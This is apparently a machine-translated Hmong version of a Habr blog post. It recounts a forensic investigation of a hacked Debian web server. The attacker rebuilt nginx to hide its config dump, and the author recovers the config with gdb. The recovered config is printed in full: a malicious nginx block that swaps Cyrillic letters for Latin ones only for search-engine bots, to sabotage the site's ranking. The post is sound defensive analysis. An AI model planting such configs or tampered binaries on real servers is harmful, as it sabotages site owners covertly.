Ib zaj dab neeg tsis txaus siab tshwm sim rau ib tus ntawm kuv cov phooj ywg. Tab sis raws li tsis kaj siab raws li nws tau ua rau Mikhail, nws tsuas yog lom zem rau kuv.
Kuv yuav tsum hais tias kuv tus phooj ywg yog heev UNIX-user: tuaj yeem nruab qhov system nws tus kheej mysql, php thiab ua kom yooj yim teeb tsa nginx.
Thiab nws muaj kaum lossis ib thiab ib nrab lub vev xaib nplooj siab rau cov cuab yeej siv.
Ib qho ntawm cov chaw no tau mob siab rau chainsaws zaum ruaj khov hauv TOP ntawm kev tshawb fawb xyaw. Lub vev xaib no yog ib tus kws tshuaj xyuas tsis yog lag luam, tab sis ib tus neeg tau nkag mus rau hauv tus cwj pwm ntawm kev tawm tsam nws. Qhov ntawd DDoS, ces brute quab yuam, ces lawv sau cov lus thuam thiab xa kev tsim txom rau lub hosting thiab rau RKN.
Mam li nco dheev, txhua yam calmed thiab qhov kev ntxhov siab no ua rau tsis zoo, thiab lub xaib pib maj mam tawm cov kab saum toj kawg nkaus ntawm cov txiaj ntsig tshawb fawb.
Qhov ntawd yog ib lo lus, tom qab ntawd tus thawj tswj hwm nws tus kheej.
Nws tau los txog rau lub sijhawm pw thaum lub xov tooj nrov: "San, koj puas yuav tsis saib kuv lub server? Nws zoo nkaus li kuv tias kuv raug nyiag lawm, kuv tsis tuaj yeem ua pov thawj, tab sis qhov kev xav tsis tau tso kuv rau lub lim tiam thib peb. Tej zaum nws tsuas yog lub sijhawm rau kuv tau txais kev kho mob paranoia?
Dab tsi ua raws li yog kev sib tham ib nrab teev uas tuaj yeem ua tiav raws li hauv qab no:
- cov av rau hacking yog heev fertile;
- tus neeg tawm tsam tuaj yeem tau txais txoj cai superuser;
- kev tawm tsam (yog tias nws tshwm sim) tau tsom tshwj xeeb ntawm qhov chaw no;
- thaj chaw teeb meem tau raug kho thiab koj tsuas yog yuav tsum nkag siab seb puas muaj kev nkag mus;
- lub hack yuav tsis cuam tshuam rau qhov chaw code thiab databases.
Hais txog lub ntsiab lus kawg.
Tsuas yog cov dawb frontend IP saib tawm mus rau hauv lub ntiaj teb no. Tsis muaj kev sib pauv ntawm cov backends thiab frontend tshwj tsis yog http(s), cov neeg siv / lo lus zais sib txawv, tsis muaj cov yuam sij pauv. Ntawm qhov chaw nyob grey, txhua qhov chaw nres nkoj tshwj tsis yog 80/443 raug kaw. Dawb backend IPs paub tsuas yog rau ob tus neeg siv, uas Mikhail ntseeg tag nrho.
Tau nruab rau ntawm lub frontend Debian 9 thiab los ntawm lub sijhawm hu xov tooj, lub kaw lus raug cais tawm ntawm lub ntiaj teb los ntawm lub firewall sab nraud thiab nres.
"Ok, muab rau kuv nkag,"Kuv txiav txim siab tso pw tsaug zog ib teev. "Kuv yuav pom nrog kuv tus kheej ob lub qhov muag."
Ntawm no thiab ntxiv:
$ grep -F PRETTY_NAME /etc/*releas*
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
$ `echo $SHELL` --version
GNU bash, version 4.4.12(1)-release (x86_64-pc-linux-gnu)
$ nginx -v
nginx version: nginx/1.10.3
$ gdb --version
GNU gdb (Debian 8.2.1-2) 8.2.1
Nrhiav rau qhov ua tau hack
Kuv pib lub server, ua ntej hauv cawm hom. Kuv mount cov disks thiab tig los ntawm lawv auth-cov ntaub ntawv, keeb kwm, cov ntaub ntawv kaw lus, thiab lwm yam, thaum twg ua tau, Kuv tshawb xyuas cov hnub tsim cov ntaub ntawv, txawm hais tias kuv nkag siab tias ib txwm cracker yuav "swept" tom qab nws tus kheej, thiab Misha twb "tso tseg" ntau thaum nws tab tom nrhiav nws tus kheej. .
Kuv pib nyob rau hauv ib txwm hom, tseem tsis tau nkag siab tiag tiag yuav nrhiav dab tsi, kuv kawm cov configs. Ua ntej tshaj plaws, kuv txaus siab rau nginx txij li thaum, nyob rau hauv dav dav, tsis muaj lwm yam nyob rau hauv lub frontend tsuas yog nws.
Cov configs yog me me, zoo tsim rau hauv ib lub kaum os cov ntaub ntawv, Kuv tsuas yog saib los ntawm lawv miv'oh ib ib. Txhua yam zoo li huv si, tab sis koj yeej tsis paub yog tias kuv nco ib yam dab tsi suav nrog, cia kuv ua ib daim ntawv teev tag nrho:
$ nginx -T
nginx: the configuration file /usr/local/etc/nginx/nginx.conf syntax is ok
nginx: configuration file /usr/local/etc/nginx/nginx.conf test is successful
Kuv tsis nkag siab: "Qhov twg yog daim ntawv teev npe?"
$ nginx -V
nginx version: nginx/1.10.3
TLS SNI support enabled
configure arguments: --with-cc-opt='-g -O2' --with-ld-opt='-Wl,-z,relro -Wl,-z,now' --prefix=/usr/share/nginx --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/nginx.lock --pid-path=/run/nginx.pid --modules-path=/usr/lib/nginx/modules --http-client-body-temp-path=/var/lib/nginx/body --http-fastcgi-temp-path=/var/lib/nginx/fastcgi --http-proxy-temp-path=/var/lib/nginx/proxy --http-scgi-temp-path=/var/lib/nginx/scgi --http-uwsgi-temp-path=/var/lib/nginx/uwsgi --with-debug --with-pcre-jit --with-ipv6 --with-http_ssl_module --with-http_stub_status_module --with-http_realip_module --with-http_auth_request_module --with-http_v2_module --with-http_dav_module --with-http_slice_module --with-threads --with-http_addition_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_sub_module --with-stream=dynamic --with-stream_ssl_module --with-mail=dynamic --with-mail_ssl_module
Ib lo lus nug thib ob yog ntxiv rau cov lus nug: "Vim li cas ib qho qub version ntawm nginx?"
Tsis tas li ntawd, lub kaw lus ntseeg tias qhov tseeb version yog ntsia:
$ dpkg -l nginx | grep "[n]ginx"
ii nginx 1.14.2-2+deb10u1 all small, powerful, scalable web/proxy server
kuv hu:
- Misha, vim li cas koj thiaj rov sib sau ua ke nginx?
- Tos, Kuv tsis paub yuav ua li cas!
- Ok, mus pw...
Nginx nws yog kom meej meej rebuilt thiab cov zis ntawm cov npe siv "-T" yog muab zais rau ib tug yog vim li cas. Tsis muaj kev tsis ntseeg txog kev nyiag nkas thiab koj tuaj yeem lees txais nws thiab (txij li Misha hloov lub server nrog ib qho tshiab) xav txog qhov teeb meem daws.
Thiab qhov tseeb, txij li ib tug neeg tau txais txoj cai hauv paus'ah, ces nws tsuas ua rau kev txiav txim siab ua qhov system reinstall, thiab nws tsis muaj txiaj ntsig los nrhiav qhov tsis ncaj ncees lawm nyob ntawd, tab sis lub sij hawm no xav paub kov yeej kev pw tsaug zog. Peb yuav ua li cas thiaj paub tias lawv xav nkaum ntawm peb li cas?
Wb sim taug qab:
$ strace nginx -T
Peb saib nws, muaj kom meej meej tsis txaus kab nyob rau hauv kab a la
write(1, "/etc/nginx/nginx.conf", 21/etc/nginx/nginx.conf) = 21
write(1, "...
write(1, "n", 1
Tsuas yog kev lom zem, cia peb sib piv cov kev tshawb pom.
$ strace nginx -T 2>&1 | wc -l
264
$ strace nginx -t 2>&1 | wc -l
264
Kuv xav tias ib feem ntawm txoj cai /src/core/nginx.c
case 't':
ngx_test_config = 1;
break;
case 'T':
ngx_test_config = 1;
ngx_dump_config = 1;
break;
tau coj mus rau hauv daim ntawv:
case 't':
ngx_test_config = 1;
break;
case 'T':
ngx_test_config = 1;
//ngx_dump_config = 1;
break;
los yog
case 't':
ngx_test_config = 1;
break;
case 'T':
ngx_test_config = 1;
ngx_dump_config = 0;
break;
yog li cov npe los ntawm "-T" tsis tshwm sim.
Tab sis peb tuaj yeem saib peb cov teeb tsa li cas?
Yog tias kuv qhov kev xav yog qhov tseeb thiab qhov teeb meem tsuas yog nyob rau hauv qhov sib txawv ngx_dump_config Wb sim nruab nws siv ua gdb, hmoov zoo muaj tus yuam sij --nrog-cc-opt -g tam sim no thiab vam tias optimization -O2 nws yuav tsis ua mob rau peb. Tib lub sijhawm, vim kuv tsis paub yuav ua li cas ngx_dump_config tuaj yeem ua tiav hauv cas 'T':, peb yuav tsis hu qhov thaiv no, tab sis nruab nws siv cas 't':
Vim li cas koj thiaj siv tau '-t' thiab '-T'Thaiv kev ua haujlwm if(ngx_dump_config) tshwm sim hauv if(ngx_test_config):
if (ngx_test_config) {
if (!ngx_quiet_mode) {
ngx_log_stderr(0, "configuration file %s test is successful",
cycle->conf_file.data);
}
if (ngx_dump_config) {
cd = cycle->config_dump.elts;
for (i = 0; i < cycle->config_dump.nelts; i++) {
ngx_write_stdout("# configuration file ");
(void) ngx_write_fd(ngx_stdout, cd[i].name.data,
cd[i].name.len);
ngx_write_stdout(":" NGX_LINEFEED);
b = cd[i].buffer;
(void) ngx_write_fd(ngx_stdout, b->pos, b->last - b->pos);
ngx_write_stdout(NGX_LINEFEED);
}
}
return 0;
}
Tau kawg, yog tias cov cai hloov pauv hauv ntu no thiab tsis nyob hauv cas 'T':, ces kuv txoj kev yuav tsis ua hauj lwm.
Test nginx.confTom qab tau daws qhov teeb meem kev sim, nws tau tsim kom muaj kev teeb tsa yam tsawg kawg nkaus rau cov malware ua haujlwm nginx hom:
events {
}
http {
include /etc/nginx/sites-enabled/*;
}
Peb yuav siv nws rau brevity nyob rau hauv tsab xov xwm.
Tua tawm lub debugger
$ gdb --silent --args nginx -t
Reading symbols from nginx...done.
(gdb) break main
Breakpoint 1 at 0x1f390: file src/core/nginx.c, line 188.
(gdb) run
Starting program: nginx -t
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Breakpoint 1, main (argc=2, argv=0x7fffffffebc8) at src/core/nginx.c:188
188 src/core/nginx.c: No such file or directory.
(gdb) print ngx_dump_config=1
$1 = 1
(gdb) continue
Continuing.
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
# configuration file /etc/nginx/nginx.conf:
events {
}
http {
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}
map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}
map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
include /etc/nginx/sites-enabled/*;
}
# configuration file /etc/nginx/sites-enabled/default:
[Inferior 1 (process 32581) exited normally]
(gdb) quit
Cov kauj ruam:
- teem ib breakpoint hauv kev ua haujlwm lub ntsiab ()
- tso lub program
- hloov tus nqi ntawm qhov sib txawv uas txiav txim siab qhov tso zis ntawm config ngx_dump_config=1
- txuas ntxiv / xaus qhov kev pab cuam
Raws li peb tuaj yeem pom, qhov kev teeb tsa tiag tiag txawv ntawm peb li, peb xaiv cov kab mob cab los ntawm nws:
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}
map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}
map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
Cia wb mus saib dab tsi tshwm sim ntawm no nyob rau hauv kev txiav txim.
Kev txiav txim Tus Neeg Siv-Tus Sawv Cev's yandex/google:
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}
Cov nplooj ntawv pabcuam raug cais tawm wordpress:
map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}
Thiab rau cov neeg uas poob rau hauv ob qho tib si ntawm cov xwm txheej saum toj no
map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}
hauv ntawv html- nplooj ntawv hloov 'O' rau 'o' и 'A' rau "a":
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
Yog lawm, tsuas yog subtlety yog qhov ntawd 'ib' != 'a' ib yam li 'o' = 'o':
Yog li, kev tshawb nrhiav cav bots tau txais, tsis yog ib txwm 100% Cyrillic ntawv nyeem, hloov cov khib nyiab diluted nrog Latin. "a" и 'o'. Kuv tsis twv yuav ua li cas qhov no cuam tshuam rau SEO, tab sis nws tsis zoo li qhov kev sib tw ntawm cov ntawv yuav muaj kev cuam tshuam zoo rau txoj haujlwm hauv kev tshawb fawb.
Kuv tuaj yeem hais li cas, cov txiv neej nrog kev xav.
ua tim khawv
Tau qhov twg los: www.hab.com